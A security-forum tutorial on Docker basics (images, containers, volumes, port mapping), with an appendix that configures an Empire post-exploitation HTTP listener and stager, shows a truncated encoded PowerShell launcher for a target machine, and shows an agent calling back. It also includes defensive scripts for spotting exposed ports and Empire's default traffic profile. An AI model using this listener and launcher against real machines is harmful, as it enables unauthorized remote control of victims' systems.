Docker Notes: Basics
wooy0ung6 · Penetration Testing · 8932 views · 2017-12-14 06:56

Author: zeroyu

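Concepts

Docker image: a read-only template that serves as the basis for creating Docker containers. An image is made up of multiple layers.

Docker container: a lightweight sandbox used to run and isolate applications.

Docker repository: the place where Docker image files are stored.

Docker distinguishes objects either by ID or by name:tag.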

Installation

Official documentation: https://docs.docker.com/

Working with images

1. Pulling an image (by default, images are pulled from Docker Hub)

docker pull kalilinux/kali-linux-docker
# To use a registry other than the official one, give the registry's full address
docker pull hub.c.163.com/public/ubuntu:14.04

Tip: use the USTC registry mirror https://docker.mirrors.ustc.edu.cn

See also: the right way to run docker build from inside China

2. Listing images

➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB

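REPOSITORY: the repository the image comes from

TAG: the image's tag, which distinguishes different images from the same repository

IMAGE ID: the image's ID; this field uniquely identifies the image

CREATED: when the image was created

SIZE: the size of the image

3. Adding an image tag

# Add the new tag kalilinux:latest to kalilinux/kali-linux-docker:latest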
➜  ~ docker tag kalilinux/kali-linux-docker:latest kalilinux:latest
# The names differ, but both refer to the same image (identical ID)
➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB
kalilinux                     latest              8ececeaf404d        9 months ago        1.56GB

4. Viewing detailed information

➜  ~ docker inspect kalilinux:latest
[
    {
        "Id": "sha256:8ececeaf404d5d63d4e9bf870f4340516f3be040e5db6c005ac8cf96d2c43536",
        "RepoTags": [
            "kalilinux/kali-linux-docker:latest",
            "kalilinux:latest"
        ],
        "RepoDigests": [
            "kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d"
        ],
        ......
        "Metadata": {
            "LastTagTime": "2017-12-02T04:56:53.8185955Z"
        }
    }
]

5. Viewing image history

➜  ~ docker history kalilinux:latest
IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
8ececeaf404d        9 months ago        /bin/sh -c #(nop)  CMD ["/bin/bash"]            0B
<missing>           9 months ago        /bin/sh -c apt-get -y update && apt-get -y...   251MB
<missing>           9 months ago        /bin/sh -c #(nop)  ENV DEBIAN_FRONTEND=non...   0B
<missing>           9 months ago        /bin/sh -c echo "deb http://http.kali.org/...   134B
<missing>           9 months ago        /bin/sh -c #(nop)  MAINTAINER steev@kali.org    0B
<missing>           11 months ago       /bin/sh -c #(nop)  CMD ["/bin/bash"]            0B
<missing>           11 months ago       /bin/sh -c apt-get -y update && apt-get -y...   286MB

6. Searching for images

# Search for automated-build images that match the keyword kali and have at least 3 stars
➜  ~ docker search --automated -s 3 kali
Flag --automated has been deprecated, use --filter=is-automated=true instead
Flag --stars has been deprecated, use --filter=stars=3 instead
NAME                           DESCRIPTION                                     STARS               OFFICIAL            AUTOMATED
kalilinux/kali-linux-docker    Kali Linux Rolling Distribution Base Image      361                                     [OK]
linuxkonsult/kali-metasploit   Kali base image with metasploit                 54                                      [OK]
jasonchaffee/kali-linux        Kali Linux Docker Container with the kali-...   8                                       [OK]
brimstone/kali                                                                 6                                       [OK]
adamoss/kali2-metasploit       Kali2 Automated Build                           4                                       [OK]
wsec/kali-metasploit           Official Kali Base image + Metasploit           3                                       [OK]
kalinon/comicstreamer          ComicStreamer is a media server app for sh...   3                                       [OK]

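7. Removing images

# If an image has several tags, docker rmi <name:tag> only removes that tag
# docker rmi <id> first removes all of the tags and then removes the image
# If a container created from the image still exists, the image cannot be removed; docker rmi -f <id> forces the removal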
➜  ~ docker images
REPOSITORY                    TAG                 IMAGE ID            CREATED             SIZE
kalilinux/kali-linux-docker   latest              8ececeaf404d        9 months ago        1.56GB
kalilinux                     latest              8ececeaf404d        9 months ago        1.56GB
➜  ~ docker rmi kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d
➜  ~ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
kalilinux           latest              8ececeaf404d        9 months ago        1.56GB

8. Creating images

1) From a container based on an existing image

# First create a container and install metasploit-framework
➜  ~ docker run -it kalilinux:latest /bin/bash
root@de573c5f5dc6:/# apt update && apt install metasploit-framework
root@de573c5f5dc6:/# exit
# Note the container ID: de573c5f5dc6
# docker commit -m "change message" -a "author name" id REPOSITORY:TAG
➜  ~ docker commit -m "install msf" -a "zeroyu" de573c5f5dc6 kalilinux:0.1
sha256:66a6770d79d88c826b2e4a38b98037c14de0b9d2ce897307dc30afbf675ce51a
➜  ~ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
kalilinux           0.1                 66a6770d79d8        21 seconds ago      2.54GB
kalilinux           latest              8ececeaf404d        9 months ago        1.56GB

2) Importing from a local template

docker import ...

9. Saving and loading images

1) Saving an image

docker save -o docker_for_msf.tar kalilinux:0.1

2) Loading an image

docker load --input docker_for_msf.tar
# or
docker load < docker_for_msf.tar

10. Pushing an image

docker push kalilinux:0.1

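Working with containers

1. Creating containers

1) Creating a new container

# A container made with docker create is in the stopped state; start it with docker start
# -i keeps standard input open; -t allocates a pseudo-terminal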
➜  ~ docker create -it kalilinux:0.1
2bc48b88a424c8056fe9e6311848d5850c4e46008feec99ee095bc341ae9adaf
# Show containers that are in the stopped state (-a lists all containers)
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                   PORTS               NAMES
2bc48b88a424        kalilinux:0.1       "/bin/bash"         7 seconds ago       Created                                      frosty_poitras
de573c5f5dc6        kalilinux:latest    "/bin/bash"         5 hours ago         Exited (0) 5 hours ago                       happy_goldberg

2) Starting a container

# docker start <id> starts the given container
# docker ps lists running containers
➜  ~ docker start 2bc48b88a424
2bc48b88a424
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
2bc48b88a424        kalilinux:0.1       "/bin/bash"         9 minutes ago       Up 8 seconds                            frosty_poitras

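3) Creating and starting a container in one step

# docker run = docker create + docker start
# What run does: 1. check whether the image exists and download it if not; 2. create a container from the image and mount a read-write layer; 3. allocate a virtual network interface;
# 4. assign an IP address; 5. run the specified program; 6. stop automatically once the program finishes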
➜  ~ docker run kalilinux:0.1 /bin/echo 'zeroyu'
zeroyu
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND              CREATED             STATUS                     PORTS               NAMES
d6a6045c4f8b        kalilinux:0.1       "/bin/echo zeroyu"   3 minutes ago       Exited (0) 3 minutes ago                       cocky_kirch
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
# The commonly used form is as follows
➜  ~ docker run -it kalilinux:0.1 /bin/bash
root@2ed8aa5354f1:/# ps
  PID TTY          TIME CMD
    1 pts/0    00:00:00 bash
    7 pts/0    00:00:00 ps
root@2ed8aa5354f1:/# exit
exit
# After exiting, the container is automatically in the stopped state
➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND              CREATED              STATUS                      PORTS               NAMES
2ed8aa5354f1        kalilinux:0.1       "/bin/bash"          About a minute ago   Exited (0) 48 seconds ago                       goofy_bardeen

4) Running in detached (daemon) mode

# Run the container in the background
➜  ~ docker run -d kalilinux:0.1 /bin/sh -c "while true ; do echo zeroyu ; sleep 1 ; done"
88f12c0725a466ba6d8f08f34fc8e9ac263ecafdff0a9e7282d7e9bb4073e6a0
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
88f12c0725a4        kalilinux:0.1       "/bin/sh -c 'while..."   7 seconds ago       Up 7 seconds                            sleepy_kowalevski
➜  ~ docker logs 88f12c0725a4
zeroyu
zeroyu
zeroyu
......

2. Stopping containers

# The ID is 88f12c0725a4, but its first few characters are enough to refer to it
➜  ~ docker stop 88
88
# List the IDs of all containers, including stopped ones
➜  ~ docker ps -qa
073ff4e1dac7
# A stopped container can be started again with start
➜  ~ docker start 073
073
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS               NAMES
073ff4e1dac7        kalilinux:0.1       "/bin/sh -c 'while..."   About a minute ago   Up About a minute                       cranky_benz
# restart stops the container and then starts it again
➜  ~ docker restart 073
073

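3. Entering a container

A container started in detached mode (the -d flag) runs in the background, so you cannot see its output or interact with it. To work inside the container, use the attach or exec command.

1) Using the attach command

# A container can also be uniquely identified by its name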
➜  ~ docker run -itd kalilinux:0.1
77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         20 seconds ago      Up 21 seconds                           stupefied_gates
➜  ~ docker attach stupefied_gates
root@77e93d18a6a5:/#

2) Using the exec command

➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                          PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         5 minutes ago       Exited (0) About a minute ago                       stupefied_gates
➜  ~ docker start 77e
77e
➜  ~ docker exec -it 77e93d18a6a5 /bin/bash
root@77e93d18a6a5:/#

4. Removing containers

➜  ~ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
77e93d18a6a5        kalilinux:0.1       "/bin/bash"         7 minutes ago       Up About a minute                       stupefied_gates
➜  ~ docker rm 77e93d18a6a5
Error response from daemon: You cannot remove a running container 77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360. Stop the container before attempting removal or force remove
➜  ~ docker stop 77e93d18a6a5
77e93d18a6a5
➜  ~ docker rm 77e93d18a6a5
77e93d18a6a5

5. Importing and exporting containers

# Export a container
# A container can be exported whether or not it is running
➜  ~ docker export -o test.tar 77e93d18a6a5
# or run
➜  ~ docker export 77e93d18a6a5 > test.tar

# Import the container
➜  ~ docker import test.tar test/kalilinux:v1.0

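Docker data management

# Use the -v flag to mount the host's /tmp directory at /opt/tmp_test in the container
# rw (also the default) makes the mount read-write
# The # characters below are the container's shell prompt, not comments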
➜  ~ docker run -it -P  --name db -v /tmp:/opt/tmp_test:rw kalilinux:0.1 /bin/sh
# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
# cd opt
# ls
tmp_test
# cd tmp_test
# ls
com.apple.launchd.0fGM76e6ao  com.apple.launchd.UWfVYRXkwo  powerlog
com.apple.launchd.AkQGotnulN  pip-FfQw68-unpack         zeroyu.txt
#

Docker port mapping

# -P maps to arbitrary host ports
# -p with port numbers maps the port to the corresponding port on all host addresses
➜  ~ docker run -it -d -p 5000:5000 kalilinux:v0.2
23e91a40cb124720b1dba81371a275169124cbff2778120b4350470fa79a0d91
➜  ~ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                    NAMES
23e91a40cb12        kalilinux:v0.2      "/bin/bash"         12 seconds ago      Up 11 seconds       0.0.0.0:5000->5000/tcp   boring_volhard
➜  ~ docker attach boring_volhard
root@23e91a40cb12:/# cd home/Empire/
root@23e91a40cb12:/home/Empire# ls
LICENSE  README.md  changelog  data  empire  lib  setup
root@23e91a40cb12:/home/Empire#
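
Added example (not part of the original post): the PORTS column above shows 0.0.0.0:5000, meaning the port is reachable on every host interface. The function below reads `docker ps --format '{{.Names}}\t{{.Ports}}'` output and lists such wildcard mappings; the function names and sample lines are constructed for this example.

```shell
#!/bin/sh
# Added example: list container ports published on every host interface.
# Input (stdin): lines of  docker ps --format '{{.Names}}\t{{.Ports}}'
# Output: one "name mapping" line per port bound to 0.0.0.0 or the IPv6 wildcard.
wildcard_ports() {
    awk -F '\t' '
    {
        n = split($2, maps, ", ")
        for (i = 1; i <= n; i++) {
            m = maps[i]
            # "80/tcp" (no "->") is exposed by the image but not published.
            if (index(m, "->") == 0) continue
            # Wildcard binds: "0.0.0.0:", and IPv6 printed as ":::" or "[::]:".
            if (index(m, "0.0.0.0:") == 1 || index(m, ":::") == 1 || index(m, "[::]:") == 1)
                print $1 " " m
        }
    }'
}

# Constructed sample input; the first line mirrors the docker ps output above.
sample_ps() {
    printf '%s\t%s\n' \
        'boring_volhard' '0.0.0.0:5000->5000/tcp' \
        'local_only'     '127.0.0.1:8080->80/tcp' \
        'dual_stack'     '0.0.0.0:443->443/tcp, :::443->443/tcp' \
        'not_published'  '80/tcp'
}

# With a live daemon: docker ps --format '{{.Names}}\t{{.Ports}}' | wildcard_ports
sample_ps | wildcard_ports
```

Publishing with -p 127.0.0.1:5000:5000 binds the port to loopback only, and such a mapping is not reported.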

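Appendix: example

Using Empire for penetration testing in Docker on a VPS (the same applies to metasploit)

# For the port mapping, see the previous section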
================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > help

Commands
========
agents            Jump to the Agents menu.
creds             Add/display credentials to/from the database.
exit              Exit Empire
help              Displays the help menu.
interact          Interact with a particular agent.
list              Lists active agents or listeners.
listeners         Interact with active listeners.
load              Loads Empire modules from a non-standard folder.
preobfuscate      Preobfuscate PowerShell module_source files
reload            Reload one (or all) Empire modules.
reset             Reset a global option (e.g. IP whitelists).
resource          Read and execute a list of Empire commands from a file.
searchmodule      Search Empire module names/descriptions.
set               Set a global option (e.g. IP whitelists).
show              Show a global option (e.g. IP whitelists).
usemodule         Use an Empire module.
usestager         Use an Empire stager.

(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://172.17.0.2:80             Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        3ab47284cf7e260541d810beb54d3405 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set Name docker
# 172.16.188.1 here is the IP address of the VPS
(Empire: listeners/http) > set Host http://172.16.188.1:5000
(Empire: listeners/http) > execute
[*] Starting listener 'docker'
[+] Listener successfully started!
(Empire: listeners/http) > lsit
*** Unknown syntax: lsit
(Empire: listeners/http) > back
(Empire: listeners) > list

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  docker            http            http://172.16.188.1:5000             5/0.0

(Empire: listeners) > usestager
multi/bash                osx/dylib                 osx/teensy                windows/launcher_sct
multi/launcher            osx/jar                   windows/bunny             windows/launcher_vbs
multi/pyinstaller         osx/launcher              windows/dll               windows/macro
multi/war                 osx/macho                 windows/ducky             windows/macroless_msword
osx/applescript           osx/macro                 windows/hta               windows/teensy
osx/application           osx/pkg                   windows/launcher_bat
osx/ducky                 osx/safari_launcher       windows/launcher_lnk
(Empire: listeners) > usestager windows/d
dll    ducky
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x64               Architecture of the .dll to generate
                                                 (x64 or x86).
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Listener docker
(Empire: stager/windows/dll) > back
(Empire: listeners) > launcher powershell docker
powershell -noP -sta -w 1 -enc ......
# Running the payload above on the target machine produces the callback below
(Empire: listeners) > [+] Initial agent G3BYNCLW from 172.17.0.1 now active (Sla
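
Added example (not part of the original post), from the defender's side: the listener's `info` output above shows a DefaultProfile of three URIs plus one User-Agent, and a listener left on those defaults can be spotted in web-proxy logs. The tab-separated log format, the function names and the sample lines are assumptions constructed for this example; a changed profile will not match.

```shell
#!/bin/sh
# Added example: flag proxy-log entries matching the DefaultProfile shown in
# the listener `info` output above (three URIs combined with one User-Agent).
# Assumed log format (constructed for this example), tab-separated:
#   time  client_ip  dest_host:port  uri_path  user_agent
PROFILE_UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'

# Prints "client dest hits" for every client/destination pair whose requests
# use one of the default URIs together with the default User-Agent.
default_profile_hits() {
    awk -F '\t' -v ua="$PROFILE_UA" '
    BEGIN {
        uri["/admin/get.php"] = 1
        uri["/news.php"] = 1
        uri["/login/process.php"] = 1
    }
    {
        path = $4
        sub(/\?.*$/, "", path)      # ignore any query string
        if ((path in uri) && $5 == ua) hits[$2 " " $3]++
    }
    END {
        for (k in hits) print k " " hits[k]
    }' | sort
}

# Constructed sample log: one client polling every 5 s (the DefaultDelay),
# one ordinary browser hitting /news.php, one default UA on an unrelated URI.
sample_proxy_log() {
    ua_other='Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0'
    printf '%s\t%s\t%s\t%s\t%s\n' \
        '10:00:01' '10.0.0.23' '172.16.188.1:5000'   '/login/process.php' "$PROFILE_UA" \
        '10:00:06' '10.0.0.23' '172.16.188.1:5000'   '/admin/get.php'     "$PROFILE_UA" \
        '10:00:11' '10.0.0.23' '172.16.188.1:5000'   '/news.php'          "$PROFILE_UA" \
        '10:00:12' '10.0.0.40' 'intranet.example:80' '/news.php'          "$ua_other" \
        '10:00:15' '10.0.0.41' 'intranet.example:80' '/index.html'        "$PROFILE_UA"
}

sample_proxy_log | default_profile_hits
```

Requiring both the URI and the User-Agent keeps ordinary traffic to a page named /news.php from being flagged.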
1 comment
jasper_sec
2019-04-26 13:27 0 Reply

This was a huge help (๑•̀ㅂ•́)و✧